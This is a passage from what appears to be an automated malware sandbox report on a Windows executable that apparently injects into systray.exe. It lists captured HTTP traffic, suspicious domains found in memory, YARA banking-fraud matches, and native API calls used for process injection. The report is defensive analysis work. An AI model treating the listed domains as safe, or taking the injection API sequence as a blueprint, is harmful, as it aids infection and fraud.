              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 11 Feb 2025 17:14:37 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 11 Feb 2025 17:14:40 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: x6fGRpae78G.exe, 00000006.00000002.4498458965.00000000058EB000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.bitcoinvendor.xyz
              Source: x6fGRpae78G.exe, 00000006.00000002.4498458965.00000000058EB000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.bitcoinvendor.xyz/1lt7/
              Source: systray.exe, 00000004.00000003.2658446377.000000000827A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: systray.exe, 00000004.00000003.2658446377.000000000827A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: systray.exe, 00000004.00000003.2658446377.000000000827A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: systray.exe, 00000004.00000003.2658446377.000000000827A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: systray.exe, 00000004.00000003.2658446377.000000000827A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: systray.exe, 00000004.00000003.2658446377.000000000827A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: systray.exe, 00000004.00000003.2658446377.000000000827A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: systray.exe, 00000004.00000002.4499033566.0000000007F90000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4496704493.000000000621C000.00000004.10000000.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000006.00000002.4496334125.0000000003E6C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
              Source: systray.exe, 00000004.00000002.4495421876.000000000349C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: systray.exe, 00000004.00000002.4495421876.00000000034C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: systray.exe, 00000004.00000002.4495421876.000000000349C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: systray.exe, 00000004.00000002.4495421876.000000000349C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: systray.exe, 00000004.00000002.4495421876.000000000349C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: systray.exe, 00000004.00000002.4495421876.00000000034C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: systray.exe, 00000004.00000003.2649216268.000000000821C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: systray.exe, 00000004.00000002.4496704493.0000000006B88000.00000004.10000000.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000006.00000002.4496334125.00000000047D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.dfsdf.party/a8it/?mdTH1=bxE0iX4XoFeHD&qv=SPUUvQKZflCEt7RI8wzTHcF8SQi3M6mUZJPT09uToqfxraP
              Source: systray.exe, 00000004.00000003.2658446377.000000000827A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
              Source: systray.exe, 00000004.00000002.4496704493.000000000608A000.00000004.10000000.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000006.00000002.4496334125.0000000003CDA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
              Source: systray.exe, 00000004.00000003.2658446377.000000000827A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

              E-Banking Fraud

              Source: Yara match File source: 0.2.JJ0tnjLiDS.exe.cd0000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000004.00000002.4496129166.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2472795382.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2472836212.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.4498458965.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.4495153571.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.4496072486.0000000004E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000003.00000002.4496171848.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2473305146.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_00CFCAA3 NtClose,0_2_00CFCAA3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_00CDAAA1 NtDelayExecution,0_2_00CDAAA1
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_00CD1768 NtProtectVirtualMemory,0_2_00CD1768
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102B60 NtClose,LdrInitializeThunk,0_2_01102B60
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_01102DF0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_01102C70
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_011035C0 NtCreateMutant,LdrInitializeThunk,0_2_011035C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01104340 NtSetContextThread,0_2_01104340
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01104650 NtSuspendThread,0_2_01104650
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102B80 NtQueryInformationFile,0_2_01102B80
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102BA0 NtEnumerateValueKey,0_2_01102BA0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102BF0 NtAllocateVirtualMemory,0_2_01102BF0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102BE0 NtQueryValueKey,0_2_01102BE0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102AB0 NtWaitForSingleObject,0_2_01102AB0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102AD0 NtReadFile,0_2_01102AD0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102AF0 NtWriteFile,0_2_01102AF0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102D10 NtMapViewOfSection,0_2_01102D10
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102D00 NtSetInformationFile,0_2_01102D00
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102D30 NtUnmapViewOfSection,0_2_01102D30
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102DB0 NtEnumerateKey,0_2_01102DB0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102DD0 NtDelayExecution,0_2_01102DD0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102C00 NtQueryInformationProcess,0_2_01102C00
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102C60 NtCreateKey,0_2_01102C60
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102CA0 NtQueryInformationToken,0_2_01102CA0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102CC0 NtQueryVirtualMemory,0_2_01102CC0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102CF0 NtOpenProcess,0_2_01102CF0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102F30 NtCreateSection,0_2_01102F30
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102F60 NtCreateProcessEx,0_2_01102F60
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102F90 NtProtectVirtualMemory,0_2_01102F90
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102FB0 NtResumeThread,0_2_01102FB0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102FA0 NtQuerySection,0_2_01102FA0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102FE0 NtCreateFile,0_2_01102FE0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102E30 NtWriteVirtualMemory,0_2_01102E30
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102E80 NtReadVirtualMemory,0_2_01102E80
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102EA0 NtAdjustPrivilegesToken,0_2_01102EA0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01102EE0 NtQueueApcThread,0_2_01102EE0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01103010 NtOpenDirectoryObject,0_2_01103010
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01103090 NtSetValueKey,0_2_01103090
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_011039B0 NtGetContextThread,0_2_011039B0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01103D10 NtOpenProcessToken,0_2_01103D10
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Code function: 0_2_01103D70 NtOpenThread,0_2_01103D70
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05234650 NtSuspendThread,LdrInitializeThunk,4_2_05234650
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05234340 NtSetContextThread,LdrInitializeThunk,4_2_05234340
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_05232D30
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232D10 NtMapViewOfSection,LdrInitializeThunk,4_2_05232D10
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_05232DF0
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232DD0 NtDelayExecution,LdrInitializeThunk,4_2_05232DD0
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232C60 NtCreateKey,LdrInitializeThunk,4_2_05232C60
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_05232C70
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_05232CA0
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232F30 NtCreateSection,LdrInitializeThunk,4_2_05232F30
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232FB0 NtResumeThread,LdrInitializeThunk,4_2_05232FB0
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232FE0 NtCreateFile,LdrInitializeThunk,4_2_05232FE0
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_05232E80
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232EE0 NtQueueApcThread,LdrInitializeThunk,4_2_05232EE0
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232B60 NtClose,LdrInitializeThunk,4_2_05232B60
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_05232BA0
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232BE0 NtQueryValueKey,LdrInitializeThunk,4_2_05232BE0
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_05232BF0
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232AF0 NtWriteFile,LdrInitializeThunk,4_2_05232AF0
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232AD0 NtReadFile,LdrInitializeThunk,4_2_05232AD0
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_052335C0 NtCreateMutant,LdrInitializeThunk,4_2_052335C0
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_052339B0 NtGetContextThread,LdrInitializeThunk,4_2_052339B0
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232D00 NtSetInformationFile,4_2_05232D00
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232DB0 NtEnumerateKey,4_2_05232DB0
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232C00 NtQueryInformationProcess,4_2_05232C00
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232CF0 NtOpenProcess,4_2_05232CF0
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232CC0 NtQueryVirtualMemory,4_2_05232CC0
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232F60 NtCreateProcessEx,4_2_05232F60
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232FA0 NtQuerySection,4_2_05232FA0
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232F90 NtProtectVirtualMemory,4_2_05232F90
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232E30 NtWriteVirtualMemory,4_2_05232E30
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232EA0 NtAdjustPrivilegesToken,4_2_05232EA0
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232B80 NtQueryInformationFile,4_2_05232B80
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05232AB0 NtWaitForSingleObject,4_2_05232AB0
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05233010 NtOpenDirectoryObject,4_2_05233010
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05233090 NtSetValueKey,4_2_05233090
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05233D10 NtOpenProcessToken,4_2_05233D10
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_05233D70 NtOpenThread,4_2_05233D70
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_03229740 NtReadFile,4_2_03229740
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_032295D0 NtCreateFile,4_2_032295D0
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_03229A40 NtAllocateVirtualMemory,4_2_03229A40
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_03229830 NtDeleteFile,4_2_03229830
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_032298D0 NtClose,4_2_032298D0
              Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04FAF1C6 NtQueryInformationProcess,4_2_04FAF1C6
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01144F400_2_01144F40
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114EFA00_2_0114EFA0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C2FC80_2_010C2FC8
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010DCFE00_2_010DCFE0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118EE260_2_0118EE26
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0E590_2_010D0E59
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118CE930_2_0118CE93
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E2E900_2_010E2E90
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118EEDB0_2_0118EEDB
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0119B16B0_2_0119B16B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BF1720_2_010BF172
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0110516C0_2_0110516C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010DB1B00_2_010DB1B0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D70C00_2_010D70C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0117F0CC0_2_0117F0CC
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011870E90_2_011870E9
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118F0E00_2_0118F0E0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118132D0_2_0118132D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BD34C0_2_010BD34C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0111739A0_2_0111739A
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D52A00_2_010D52A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EB2C00_2_010EB2C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011712ED0_2_011712ED
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011875710_2_01187571
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116D5B00_2_0116D5B0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011995C30_2_011995C3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118F43F0_2_0118F43F
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C14600_2_010C1460
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118F7B00_2_0118F7B0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011156300_2_01115630
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011816CC0_2_011816CC
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011659100_2_01165910
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D99500_2_010D9950
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EB9500_2_010EB950
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113D8000_2_0113D800
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D38E00_2_010D38E0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118FB760_2_0118FB76
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EFB800_2_010EFB80
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01145BF00_2_01145BF0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0110DBF90_2_0110DBF9
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118FA490_2_0118FA49
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01187A460_2_01187A46
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01143A6C0_2_01143A6C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01115AA00_2_01115AA0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01171AA30_2_01171AA3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116DAAC0_2_0116DAAC
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0117DAC60_2_0117DAC6
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01181D5A0_2_01181D5A
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D3D400_2_010D3D40
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01187D730_2_01187D73
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EFDC00_2_010EFDC0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01149C320_2_01149C32
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118FCF20_2_0118FCF2
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118FF090_2_0118FF09
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D1F920_2_010D1F92
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118FFB10_2_0118FFB1
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D9EB00_2_010D9EB0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052005354_2_05200535
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052C05914_2_052C0591
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052A44204_2_052A4420
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052B24464_2_052B2446
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052AE4F64_2_052AE4F6
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052007704_2_05200770
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052247504_2_05224750
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_051FC7C04_2_051FC7C0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0521C6E04_2_0521C6E0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_051F01004_2_051F0100
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0529A1184_2_0529A118
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052881584_2_05288158
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052C01AA4_2_052C01AA
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052B81CC4_2_052B81CC
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052920004_2_05292000
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BA3524_2_052BA352
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052C03E64_2_052C03E6
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0520E3F04_2_0520E3F0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052A02744_2_052A0274
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052802C04_2_052802C0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0520AD004_2_0520AD00
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0529CD1F4_2_0529CD1F
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05218DBF4_2_05218DBF
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_051FADE04_2_051FADE0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05200C004_2_05200C00
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052A0CB54_2_052A0CB5
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_051F0CF24_2_051F0CF2
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05242F284_2_05242F28
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05220F304_2_05220F30
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052A2F304_2_052A2F30
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05274F404_2_05274F40
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0527EFA04_2_0527EFA0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0520CFE04_2_0520CFE0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_051F2FC84_2_051F2FC8
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BEE264_2_052BEE26
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05200E594_2_05200E59
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05212E904_2_05212E90
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BCE934_2_052BCE93
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BEEDB4_2_052BEEDB
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052169624_2_05216962
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052029A04_2_052029A0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052CA9A64_2_052CA9A6
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0520A8404_2_0520A840
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052028404_2_05202840
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_051E68B84_2_051E68B8
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0522E8F04_2_0522E8F0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BAB404_2_052BAB40
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052B6BD74_2_052B6BD7
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_051FEA804_2_051FEA80
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052B75714_2_052B7571
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0529D5B04_2_0529D5B0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BF43F4_2_052BF43F
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_051F14604_2_051F1460
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BF7B04_2_052BF7B0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052B16CC4_2_052B16CC
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052CB16B4_2_052CB16B
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0523516C4_2_0523516C
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_051EF1724_2_051EF172
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0520B1B04_2_0520B1B0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052B70E94_2_052B70E9
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BF0E04_2_052BF0E0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052070C04_2_052070C0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052AF0CC4_2_052AF0CC
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052B132D4_2_052B132D
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_051ED34C4_2_051ED34C
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0524739A4_2_0524739A
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052052A04_2_052052A0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052A12ED4_2_052A12ED
